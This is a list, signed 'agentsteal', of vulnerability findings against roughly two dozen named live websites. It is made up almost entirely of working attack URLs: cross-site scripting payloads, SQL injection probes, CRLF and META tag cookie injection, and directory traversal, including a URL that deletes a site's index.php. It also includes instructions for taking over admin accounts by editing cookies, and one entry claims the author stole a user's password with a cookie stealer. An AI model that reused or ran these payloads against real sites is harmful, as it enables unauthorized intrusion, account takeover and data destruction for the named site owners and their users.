agentsteal

Array: http://www.businesstips101.com/news/yourageinseconds2.php?name[] Cross Site Scripting: http://www.businesstips101.com/news/yourageinseconds2.php?name=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.

Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: http://octub.com/eve/?l=order&sl=cart&ship=582

Cross Site Scripting: There is Cross Site Scripting if you post a note that contains code. Drop Down Menu: If you edit the Category drop down menu you can submit arbitrary values. SQL Injection: You can create columns in the table by submitting new categories.

Array: http://www.ragingmortals.com/postoffice.php?fromper[] Array: http://www.ragingmortals.com/postoffice.php?ini[] Cross Site Scripting: http://www.ragingmortals.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.ragingmortals.com/postoffice.php?ini=</textarea><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting in the forum if you post a topic that contains code. Full Path Disclosure: http://www.ragingmortals.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://www.ragingmortals.com/includes/functions_tst.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Includes Directory: http://www.ragingmortals.com/includes/ PHP Source Code Disclosure: There is PHP Source Code Disclosure on the 404 page. <?php if ($SESSION['username']){ echo "Or you cant return to the <a href=index2.php>game!"; } ?> User Enumeration: http://www.ragingmortals.com/~ragingmo User Enumeration: http://www.ragingmortals.com/~root

Includes Directory: http://nasir.prohosts.org/config/

Array: http://www.fantour.org/account.php?msg[] Array: http://www.fantour.org/searchresults.php?search[] Cross Site Scripting: http://www.fantour.org/account.php?msg=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.fantour.org/addfavconfirm.php?id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.fantour.org/artistshows.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.fantour.org/fans.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.fantour.org/searchresults.php?search="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.fantour.org/showphotos.php?un=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code. Cross Site Scripting: There is Cross Site Scripting if you register with ">code in the fields. Full Path Disclosure: http://www.fantour.org/addfavconfirm.php Full Path Disclosure: http://www.fantour.org/createshow.php?page=action Full Path Disclosure: http://www.fantour.org/delcommentconfirm.php Full Path Disclosure: http://www.fantour.org/login.php Full Path Disclosure: http://www.fantour.org/show.php Full Path Disclosure: http://www.fantour.org/showattenders.php Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image. Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.fantour.org/components/. Includes Directory: http://www.fantour.org/components/ SQL Dump: http://www.fantour.org/addfavconfirm.php SQL Dump: http://www.fantour.org/show.php User Enumeration: http://www.fantour.org/~fantouro User Enumeration: http://www.fantour.org/~root

Array: http://www.cashladders.com/ladders/king.php?ladder[] Cross Site Scripting: http://www.cashladders.com/ladders/challenge.php?login[cid]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/challenge.php?login[id]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/challengedb.php?chall[ladderid]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/join.php?action=jointourney&login[id]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/king.php?ladder='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/report.php?login[wid]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/standings.php?ladder[id]=1&ladder[rank]=1&ladder[unranked]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.cashladders.com/ladders/matchdb.php?matchdb[ladderid]='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the War Details contain </textarea>code. Cross Site Scripting: There is Cross Site Scripting if your username contains '>code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain 'code. Drop Down Menu: If you edit the Timezone drop down menu you can set it to arbitrary values. Full Path Disclosure: http://www.cashladders.com/ladders/admin_3strikes.php Full Path Disclosure: http://www.cashladders.com/ladders/admin_3strikes_add.php Full Path Disclosure: http://www.cashladders.com/ladders/admin_report_db.php Full Path Disclosure: http://www.cashladders.com/ladders/challengedb.php?chall[start][] Full Path Disclosure: http://www.cashladders.com/ladders/html.php Full Path Disclosure: http://www.cashladders.com/ladders/king.php?matchdb[start][] Full Path Disclosure: http://www.cashladders.com/ladders/level.php Full Path Disclosure: http://www.cashladders.com/ladders/matchdb.php?matchdb[start][] Full Path Disclosure: http://www.cashladders.com/ladders/news_inc.php Full Path Disclosure: http://www.cashladders.com/ladders/ranks_inc.php Full Path Disclosure: http://www.cashladders.com/ladders/report_inc_db.php Full Path Disclosure: http://www.cashladders.com/ladders/strikes_main.php SQL Error: http://www.cashladders.com/ladders/king.php?matchdb[start]='

Admin Access: The password box contains your password. Array: http://www.pidbaq.com/raids/raids.php?raid[] Cross Site Scripting: http://www.pidbaq.com/raids/raids.php?action=view&raid=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.pidbaq.com/raids/raids.php?decision=delete&raid='><marquee><h1>vulnerable</marquee> Includes Directory: http://www.pidbaq.com/raids/ Log: http://www.pidbaq.com/raids/action_log

Cross Site Scripting: http://www.visiscreen.com/~vincent/phpinfo.php?<script>alert('vulnerable')</script> Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: http://www.visiscreen.com/~vincent/phpinfo.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Full Path Disclosure: There is Full Path Disclosure if your username contains ' Full Path Disclosure: There is Full Path Disclosure on the Attack page.

Cross Site Scripting: There is Cross Site Scripting in the iframe on the index page. Cross Site Scripting: There is Cross Site Scripting in the screenshots. Cross Site Scripting: There is Cross Site Scripting on http://fbc.ourproject.org/edituser.php if the fields contain ">code. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://fbc.ourproject.org/~root You can upload multiple screenshots by changing the extension.

Admin Access: You can log in as admin by setting the user cookie to admin. Cross Site Scripting: There is Cross Site Scripting if the lstvsit cookie contains code. Cross Site Scripting: There is Cross Site Scripting if the user cookie contains code. DOS: http://www.sentry.dreamhosters.com/stylechanger.php Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by setting the user cookie to their username.

Cross Site Scripting: http://www.babble-net.com/?action=NewThread2&id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.babble-net.com/info.php?<script>alert('vulnerable')</script> Full Path Disclosure: http://www.babble-net.com/?action=NewThread2&id[] Full Path Disclosure: http://www.babble-net.com/?action=Reply2&id[] Full Path Disclosure: http://www.babble-net.com/?action=Reply2&pid[] Full Path Disclosure: http://www.babble-net.com/?action=usercp&user[] Full Path Disclosure: http://www.babble-net.com/?action=ViewBoard&id[] Full Path Disclosure: http://www.babble-net.com/?action=ViewThread&id[] Full Path Disclosure: http://www.babble-net.com/?action=ViewThread&pid[] Full Path Disclosure: http://www.babble-net.com/info.php SQL Injection: http://www.babble-net.com/?action=NewThread2&id=a AND 1=1 http://www.babble-net.com/?action=NewThread2&id=a AND 1=2

Array: http://blokdudez.110mb.com/forum/show_cat.php?cat[] Array: http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP[] Array: http://blokdudez.110mb.com/topic.php?topic[] Cross Site Scripting: http://blokdudez.110mb.com/forum/do_post.php?path=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://blokdudez.110mb.com/forum/make_topic.php?path='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://blokdudez.110mb.com/forum/show_cat.php?cat=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://blokdudez.110mb.com/topic.php?topic=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you post a topic that contains "code. Full Path Disclosure: http://blokdudez.110mb.com/forum/make_topic.php

Full Path Disclosure: http://www.fast.st/zapwiki/demo/index.php?p=a User Enumeration: http://www.fast.st/~fastst User Enumeration: http://www.fast.st/~root

Cross Site Scripting: There is Cross Site Scripting if you submit code.

Admin Access: The SQL Dump contains your password. Admin Access: You can upload any file onto the server. Cross Site Scripting: There is Cross Site Scripting when you upload a file if the filename contains code. Cross Site Scripting: There is Cross Site Scripting in the admin messages. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://jagguy.ej.am/school/test/upfile2.php Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://jagguy.ej.am/school/test/. Includes Directory: http://jagguy.ej.am/school/test/ Includes Directory: http://jagguy.ej.am/school/test/student_files/ PHP Source Code Disclosure: http://jagguy.ej.am/school/test/ SQL Dump: http://jagguy.ej.am/school/test/db/ You can upload any file if the filename contains .txt.

Array: http://speaker219.ath.cx:8080/message/send.php?hand[] Cross Site Scripting: http://speaker219.ath.cx:8080/message/send.php?hand=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://speaker219.ath.cx:8080/message/test.php?ip=1.1.1.1&hand="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you submit a message that contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a note that contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting if your password contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Directory Transversal: You can make txt files in any directory by registering with the username set to ../filename. Full Path Disclosure: http://speaker219.ath.cx:8080/login/database.php Full Path Disclosure: http://speaker219.ath.cx:8080/login/register.php Full Path Disclosure: There is Full Path Disclosure on the admin page. Full Path Disclosure: There is Full Path Disclosure when you register. Log: http://speaker219.ath.cx:8080/message/admin.txt Multiple users can register the same username. PHP Source Code Disclosure: http://speaker219.ath.cx:8080/message/index.php~ You can make txt files in http://speaker219.ath.cx:8080/message/passys/ by registering with the username set to the filename. You shouldn't put the password in the URL. You shouldn't put the username in the URL.

Admin Access: You can use the Directory Transversal to delete arbitrary files on the server. Cross Site Scripting: http://www.mycrdisorder.org/viewuser.php?user='onmouseover=alert('vulnerable') Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains code. Cross Site Scripting: There is Cross Site Scripting if you upload an image that contains code in the filename. Cross Site Scripting: There is Cross Site Scripting on http://www.mycrdisorder.org/contact.php if you send a message that contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.mycrdisorder.org/user.php?dpic=main&pic=../../images/mycrdheader.jpg Directory Transversal: http://www.mycrdisorder.org/user.php?function=viewuser&dpic=delete&pic=../../index.php Multiple users can upload the same filename.

Admin Access: I got your username and password with a cookie stealer. Array: http://www.dreamshowstudios.net/programs.php?id[] Array: http://dreamshowstudios.net/viewpic.php?full[] Cross Site Scripting: http://dreamshowstudios.net/pm.php?dignore=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.dreamshowstudios.net/programs.php?id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.dreamshowstudios.net/viewpic.php?pic="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you send a message that contains code. Cross Site Scripting: There is Cross Site Scripting in the Shoutbox. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.dreamshowstudios.net/viewpic.php?pic=../Images/splash Drop Down Menu: If you edit the drop down menu on http://www.dreamshowstudios.net/viewpic.php you can submit arbitrary values. Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?action[] Full Path Disclosure: http://www.dreamshowstudios.net/forums/index.php?board[] Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg=-1 Full Path Disclosure: http://www.dreamshowstudios.net/members.php?&pg[] Full Path Disclosure: http://www.dreamshowstudios.net/pm.php?pto=Tester Full Path Disclosure: There is Full Path Disclosure in the Shoutbox. Full Path Disclosure: There is Full Path Disclosure when you register. Includes Directory: http://www.dreamshowstudios.net/h2/ Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. Maximum Length: If you edit the input boxes in your profile you can remove the maximum lengths. PHP Source Code Disclosure: http://www.dreamshowstudios.net/backup/ PHP Source Code Disclosure: SQL Injection: http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=1 http://www.dreamshowstudios.net/pm.php?func=del&mid=52 AND 1=2 SQL Injection: http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=1 http://www.dreamshowstudios.net/pm.php?pto=Tester&mid=48 AND 1=2 SQL Injection: http://www.dreamshowstudios.net/programs.php?id=3 AND 1=1 http://www.dreamshowstudios.net/programs.php?id=3 AND 1=2

Admin Access: Anyone can access the admin panel after viewing the admin profile. Array: http://www.evillair.net/sourcebb/edit_message.php?id[] Cross Site Scripting: http://www.evillair.net/sourcebb/edit_message.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you edit a post that contains code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the fields contain code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on the 404 page. http://www.evillair.net/sourcebb/<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.evillair.net/sourcebb/edit_message.php

Admin Access: Anyone can access the admin panel by preventing the page from redirecting. Cross Site Scripting: http://sinisa.milicevici.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://sinisa.milicevici.com/phpinfo.php?<script>alert('vulnerable')</script> Cross Site Scripting: http://sinisa.milicevici.com/real_estate/details.php?id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. DOS: http://www.sinisa.milicevici.com/real_estate/admin/admin.php/ Drop Down Menu: If you edit the drop down menu on the Listing page you can submit arbitrary values. Full Path Disclosure: http://sinisa.milicevici.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://sinisa.milicevici.com/phpinfo.php Full Path Disclosure: http://sinisa.milicevici.com/real_estate/details.php?id[] Full Path Disclosure: http://sinisa.milicevici.com/real_estate/members/feature_it.php?id[] Full Path Disclosure: http://sinisa.milicevici.com/real_estate/members/pictures_edit.php?id[] Full Path Disclosure: There is Full Path Disclosure if you set the PHPSESSID cookie to an invalid value. Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image. Full Path Disclosure: There is Full Path Disclosure on the admin page. User Enumeration: http://sinisa.milicevici.com/~root User Enumeration: http://sinisa.milicevici.com/~zoranm

Cross Site Scripting: http://www.arteinsania.net/?pname=</div><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://www.arteinsania.net/p_home.php Full Path Disclosure: There is Full Path Disclosure on the 404 page. http://www.arteinsania.net/site/whatever

Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: There is Cross Site Scripting on the 404 page. http://www.phpfootball.net/footballtest/<marquee><h1>vulnerable</marquee> Full Path Disclosure: There is Full Path Disclosure if you log in with a long username.

Cross Site Scripting: There is Cross Site Scripting if the fields are set to ">code. META Tag Injection: http://www.mpmgraphics.com/oats/?text1=<meta+http-equiv='Set-cookie'+content='vulnerable=true'>

Array: http://www.simple-scripts-online.com/signinform.php?msg[] Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insert_rating.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insertemails.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable Cross Site Scripting: http://www.simple-scripts-online.com/signinform.php?msg=><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.simple-scripts-online.com/software-description.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.simple-scripts-online.com/tools/search/search.php?query="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.simple-scripts-online.com/tools/. Includes Directory: http://www.simple-scripts-online.com/_private/ Includes Directory: http://www.simple-scripts-online.com/_vti_pvt/ Includes Directory: http://www.simple-scripts-online.com/banners/_vti_cnf/ Includes Directory: http://www.simple-scripts-online.com/htdocs/ Includes Directory: http://www.simple-scripts-online.com/images/_vti_cnf/ Includes Directory: http://www.simple-scripts-online.com/tools/ Includes Directory: http://www.simple-scripts-online.com/users/ SQL Injection: http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=1 http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=2 SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/advertise1.php. SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/showcategory.php. SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/signup.php. URL Inclusion: http://www.simple-scripts-online.com/clicks_inc.php?id=1&click=1&url=http://www.google.com/